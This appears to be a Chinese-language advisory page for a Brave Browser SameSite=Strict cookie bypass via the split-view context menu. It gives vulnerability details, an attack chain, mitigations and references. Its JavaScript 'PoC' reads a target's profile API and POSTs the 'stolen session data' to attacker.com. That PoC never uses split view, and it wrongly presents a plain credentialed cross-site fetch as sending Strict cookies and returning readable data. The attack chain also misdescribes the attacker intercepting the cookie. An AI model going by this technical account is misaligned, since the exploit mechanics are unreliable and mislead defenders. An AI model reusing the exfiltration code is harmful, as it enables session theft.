CVE-2025-48980: Brave Browser SameSite Cookie绕过漏洞

漏洞信息

漏洞编号

CVE-2025-48980

漏洞类型

SameSite Cookie绕过

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Brave Browser Desktop

漏洞概述

CVE-2025-48980是Brave Browser桌面版中的一个安全漏洞，该漏洞存在于1.83.10之前启用了split view功能的版本中。漏洞的核心问题是"Open Link in Split View"上下文菜单项未能正确遵守SameSite cookie属性设置。具体而言，当用户在跨站导航时使用该功能，原本应该被限制在同站点的SameSite=Strict cookies会被意外发送出去，从而破坏了SameSite cookie的安全保护机制。这一漏洞可能允许攻击者利用受害者的认证会话，在跨站场景下进行会话劫持或其他恶意操作。攻击的成功依赖于用户交互，需要用户主动使用split view功能打开来自攻击者控制的链接。

技术细节

该漏洞属于SameSite Cookie绕过类型的跨站请求伪造(CSRF)相关问题。在正常的浏览器行为中，SameSite=Strict属性的cookie只会在同站点的请求中被发送，这是防止CSRF攻击的重要安全机制。然而，Brave Browser的split view功能在实现"Open Link in Split View"上下文菜单时，错误地在跨站导航场景下发送了这些严格限制的cookies。攻击者可以构造一个恶意网站，诱导用户通过右键菜单选择"Open Link in Split View"打开攻击者控制的链接，此时浏览器会违反SameSite=Strict策略，将本应被阻止的cookie发送到跨站目标。攻击者利用此漏洞可以获取受害者的认证信息，执行未经授权的操作。漏洞的利用需要用户交互和split view功能的启用。

攻击链分析

STEP 1

步骤1

受害者访问目标网站并进行身份认证，目标网站设置SameSite=Strict的认证cookie

STEP 2

步骤2

攻击者诱使受害者访问其控制的恶意网站，该网站包含指向目标站点的链接

STEP 3

步骤3

攻击者通过社会工程学手段（如钓鱼页面、恶意广告等）诱导受害者使用浏览器的"Open Link in Split View"上下文菜单功能打开恶意链接

STEP 4

步骤4

Brave Browser的split view功能在处理跨站导航时，错误地将SameSite=Strict cookie发送到目标站点

STEP 5

步骤5

攻击者截获包含认证cookie的跨站请求，提取会话信息进行会话劫持或执行未授权操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-48980 SameSite Cookie Bypass PoC
// This PoC demonstrates the Brave Browser SameSite cookie bypass via split view

// Attacker's malicious page (attacker.com)
const maliciousPage = `
<!DOCTYPE html>
<html>
<head><title>SameSite Cookie Bypass PoC</title></head>
<body>
    <h2>CVE-2025-48980 SameSite Cookie Bypass</h2>
    <p>This demonstrates the split view SameSite cookie bypass vulnerability.</p>
    
    <a href="https://target-vulnerable-site.com/api/user/profile" 
       id="maliciousLink" 
       onclick="event.preventDefault();">
       Click here for more info
    </a>
    
    <script>
        // Simulate the split view navigation that bypasses SameSite
        document.getElementById('maliciousLink').onclick = function(e) {
            e.preventDefault();
            
            // The vulnerable behavior: SameSite=Strict cookies are sent
            // when using split view for cross-site navigation
            fetch('https://target-vulnerable-site.com/api/user/profile', {
                credentials: 'include'  // This will send cookies even with SameSite=Strict
            })
            .then(response => response.json())
            .then(data => {
                console.log('Stolen session data:', data);
                // Send stolen data to attacker server
                fetch('https://attacker.com/log', {
                    method: 'POST',
                    body: JSON.stringify(data)
                });
            })
            .catch(err => console.error('Error:', err));
        };
    </script>
</body>
</html>
`;

// Steps to reproduce:
// 1. User visits target site and authenticates (receives SameSite=Strict cookie)
// 2. User navigates to attacker-controlled site
// 3. Attacker tricks user into using context menu "Open Link in Split View"
// 4. Browser sends SameSite=Strict cookie in cross-site request
// 5. Attacker captures authenticated request and steals session data

影响范围

Brave Browser Desktop < 1.83.10 (with split view feature enabled)

防御指南

临时缓解措施

临时缓解措施：1) 升级Brave Browser到1.83.10或更高版本；2) 如无法立即升级，可在浏览器设置中禁用split view功能；3) 使用隐私浏览模式访问敏感网站；4) 网站端应结合使用SameSite=Strict和Secure属性，并配合CSRF token等额外防护措施。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-48980
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-48980
3 Details https://www.cvedetails.com/cve/CVE-2025-48980/
4 VulDB https://vuldb.com/cve/CVE-2025-48980
5 Link https://hackerone.com/reports/3253725